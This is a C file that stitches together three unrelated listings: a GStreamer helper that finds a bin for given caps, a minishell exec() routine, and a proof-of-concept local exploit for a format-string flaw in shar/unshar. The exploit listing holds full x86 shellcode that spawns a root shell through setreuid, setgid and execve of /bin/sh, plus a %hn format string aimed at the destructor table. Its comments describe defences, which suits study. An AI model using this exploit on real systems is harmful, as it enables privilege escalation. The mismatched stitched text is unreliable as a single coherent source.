/*
 * kms_agnostic_bin2_find_bin_for_caps:
 * @self: the agnostic bin whose private state is searched
 * @caps: the caps a candidate bin has to satisfy
 *
 * Looks for an already existing bin that check_bin() accepts for @caps.
 * ANY or EMPTY caps short-circuit to the input bin. Otherwise the input
 * bin is tried first, then the bins stored in priv->bins; the search stops
 * at the first match. g_hash_table_get_values() gives no ordering
 * guarantee, so when several stored bins match, which one is returned is
 * not fixed.
 *
 * Returns: the matching bin, or NULL when nothing matches. No reference is
 * taken here, so the caller receives a borrowed pointer.
 */
static GstBin *
kms_agnostic_bin2_find_bin_for_caps (KmsAgnosticBin2 * self, GstCaps * caps)
{
  GstBin *found = NULL;
  GList *values, *iter;

  if (gst_caps_is_any (caps) || gst_caps_is_empty (caps))
    return self->priv->input_bin;

  if (check_bin (KMS_TREE_BIN (self->priv->input_bin), caps))
    found = self->priv->input_bin;

  /* The list container is ours to free; its elements stay owned by the
   * hash table. */
  values = g_hash_table_get_values (self->priv->bins);
  iter = values;

  while (iter != NULL && found == NULL) {
    KmsTreeBin *candidate = KMS_TREE_BIN (iter->data);

    if (check_bin (candidate, caps))
      found = GST_BIN_CAST (candidate);

    iter = iter->next;
  }

  g_list_free (values);

  return found;
}
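/*
** exec: run one parsed command.
**
** cmd->tab is the argument vector (tab[0] is the command word), cmd->env the
** environment handed to the new program, cmd->cmd the path given to execve()
** and cmd->ret the field that receives the exit status.
**
** Order of operations:
**  - a '/' in the command word sets cmd->bin, which bypasses check_bin();
**  - sh_cmd() runs first and a zero return ends the function (presumably
**    the command was handled there -- confirm against sh_cmd);
**  - otherwise the program is forked and executed, and the parent waits.
**
** NOTE(review): when cmd->bin is set, cmd->cmd is executed exactly as
** supplied; where cmd->cmd is filled in for that case is not visible here.
**
** Changes from the previous version:
**  - the parent waits for the child it just created (waitpid on pid) rather
**    than for any child, and only when fork() succeeded; before, a failed
**    fork() still reached wait() and could store 0 in cmd->ret;
**  - the child always terminates after a failed execve(). If sh_error()
**    returns, the old code let the child fall through into the parent's
**    wait/status logic and carry on as a second copy of the shell.
*/
void	exec(t_cmd *cmd)
{
	pid_t	pid;
	int		stat;

	stat = 0;
	if (ft_strchr(cmd->tab[0], '/'))
		cmd->bin = 1;
	if (!sh_cmd(cmd))
		return ;
	if (cmd->bin != 1 && !check_bin(cmd))
	{
		sh_error(0, cmd, 0);
		return ;
	}
	gestion_signal(1);
	pid = fork();
	if (pid < 0)
		sh_error(1, cmd, -1);
	else if (pid == 0)
	{
		/* execve() only returns on failure, and then always with -1. */
		execve(cmd->cmd, cmd->tab, cmd->env);
		sh_error(2, cmd, -1);
		/* Never let the child return into the shell's main loop. */
		_exit(127);
	}
	else if (waitpid(pid, &stat, 0) == pid)
	{
		if (WIFEXITED(stat))
			cmd->ret = WEXITSTATUS(stat);
		else if (WIFSIGNALED(stat))
			signal_message_exec(WTERMSIG(stat));
	}
	gestion_signal(0);
}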
/*
 * Proof-of-concept driver that appears to target a format-string flaw in
 * the shar/unshar binaries named by SHAR_PATH / UNSHAR_PATH. Those macros,
 * NOP, WBIN and the four helpers declared below are defined outside this
 * listing.
 *
 * Flow as written:
 *   1. Put a NOP-padded 32-bit x86 Linux payload into the environment
 *      under the name CANDY.
 *   2. Ask get_dtors() for an address in the target binary (the helper name
 *      suggests the .dtors destructor table -- confirm) and derive two
 *      half-word write targets from it.
 *   3. Build a format string whose two %hn directives store the estimated
 *      payload address into those targets.
 *   4. execlp() the target with that string as its argument.
 *
 * Defensive reading: each step relies on a property that hardened builds
 * remove. The root cause is a caller-controlled string reaching a
 * printf-family format parameter; passing it through "%s" fixes it and
 * -Wformat-security reports the pattern at compile time. glibc's
 * _FORTIFY_SOURCE=2 aborts on %n in a writable format string, RELRO makes
 * the relocation and destructor tables read-only, NX keeps the stack and
 * environment non-executable, and ASLR invalidates the hard-coded stack
 * estimate used below. The setreuid(0,0)/setgid(0) prologue only matters
 * when the target runs with elevated privileges.
 */
int main(void) {
    /* Helpers implemented elsewhere in the original file. */
    int16_t check_bin(void);
    u_int32_t get_dtors(int8_t* path);
    int16_t get_auto_stack_offset(int8_t *binpath);
    void banner(void);

    int8_t envbuf[1000];      /* NOP padding followed by the payload */
    int8_t store_env[1010];   /* "CANDY=" followed by envbuf */
    int8_t *shar_path = SHAR_PATH;
    int8_t *unshar_path = UNSHAR_PATH;

    /* Payload bytes; the annotations are the original author's. */
    static u_int8_t shellcode[] =
        // setreuid(0,0)
        "\x31\xc0"                  // xor %eax,%eax
        "\x31\xdb"                  // xor %ebx,%ebx
        "\x31\xc9"                  // xor %ecx,%ecx
        "\xb0\x46"                  // mov $0x46,%al
        "\xcd\x80"                  // int $0x80
        // setgid(0)
        "\x31\xdb"                  // xor %ebx,%ebx
        "\x89\xd8"                  // mov %ebx,%eax
        "\xb0\x2e"                  // mov $0x2e,%al
        "\xcd\x80"                  // int $0x80
        // execve /bin/sh
        "\x31\xc0"                  // xor %eax,%eax
        "\x50"                      // push %eax
        "\x68\x2f\x2f\x73\x68"      // push $0x68732f2f
        "\x68\x2f\x62\x69\x6e"      // push $0x6e69622f
        "\x89\xe3"                  // mov %esp,%ebx
        "\x8d\x54\x24\x08"          // lea 0x8(%esp,1),%edx
        "\x50"                      // push %eax
        "\x53"                      // push %ebx
        "\x8d\x0c\x24"              // lea (%esp,1),%ecx
        "\xb0\x0b"                  // mov $0xb,%al
        "\xcd\x80"                  // int $0x80
        // exit();
        "\x31\xc0"                  // xor %eax,%eax
        "\xb0\x01"                  // mov $0x1,%al
        "\xcd\x80";                 // int $0x80

    banner();
    /* Stop when check_bin() reports failure (its checks are not shown here). */
    if(!check_bin()) exit(EXIT_FAILURE);

    /* Fill envbuf with NOP bytes and copy the payload over its tail. */
    memset(envbuf,NOP,sizeof(envbuf));
    strcpy((int8_t *)&envbuf[sizeof(envbuf) - strlen(shellcode)],shellcode);

    /* Intended to form the "CANDY=<envbuf>" entry and export it. */
    memcpy(store_env,"CANDY=",6);
    strcat(store_env,envbuf);
    putenv(store_env);
    /* NOTE(review): this tests the address of putenv, not the result of the
     * call above, so the branch is never taken. */
    if(!putenv) {
        if(errno == ENOMEM) {
            strerror(errno);
            exit(EXIT_FAILURE);
        }
    }

    const int8_t *USEBIN;     /* path of the binary selected by WBIN */
    int16_t USE_OFFSET;       /* argument position used by the %N$hn directives */

    /* WBIN is a compile-time selector defined outside this listing. */
    if(WBIN == 1){
        printf("[+]Exploiting the unshar binary\n");
        USEBIN = unshar_path;
    }
    if(WBIN == 2){
        printf("[+]Default binary is shar\n");
        USEBIN = shar_path;
    }
    if(WBIN == 3) {
        printf("[+]Exploiting Shar binary\n");
        USEBIN = shar_path;
    }

    int8_t store[200];        /* receives the generated format string */

    /* Looks like an estimate of where the CANDY string lands near the top of
     * a 32-bit, non-randomised stack -- confirm. It is a fixed-layout guess,
     * which is exactly what ASLR breaks. */
    u_int32_t fakebuf = 0xbffffffa - strlen(store_env) - strlen("/usr/bin/shar") + 50;

    /* Address returned by get_dtors() for the selected binary; the two
     * entries below address its upper and lower 16-bit halves. */
    u_int32_t write_dtors = get_dtors((int8_t *)USEBIN);
    int8_t *dtors_target[3] = {
        (int8_t *) write_dtors + 2,
        (int8_t *) write_dtors,
        NULL
    };

    /* Split the estimate into 16-bit halves, one per %hn store. */
    int16_t env_most, env_low;
    env_most = (fakebuf & 0xffff0000) >> 16 ;
    env_low = (fakebuf & 0x0000ffff);
    env_most -= 0x8;

    USE_OFFSET = get_auto_stack_offset((int8_t *)USEBIN);

    /* Two padded %x conversions set the running output count before each
     * positional %hn directive. */
    sprintf(store,"%s%%.%dx%%%d$hn%%.%dx%%%d$hn",
            &dtors_target,
            (u_int16_t)env_most,
            USE_OFFSET,
            (env_low - env_most) - 0x8,
            USE_OFFSET + 1);

    fprintf(stdout,"[+]Type some command,sh$ prompt may not occur\n");
    fprintf(stdout,"[+]Terminal echoing is possibly off \n");
    fprintf(stdout,"Type any shell command Here i.e 'id' or 'ps aux'\n");

    /* Replaces this process with the target, passing the generated string
     * as its single argument. */
    execlp(USEBIN,USEBIN,store);

    /* Reached only if execlp() fails. */
    fflush(stdin);
    fflush(stdout);
    return EXIT_SUCCESS; // useless, never return
}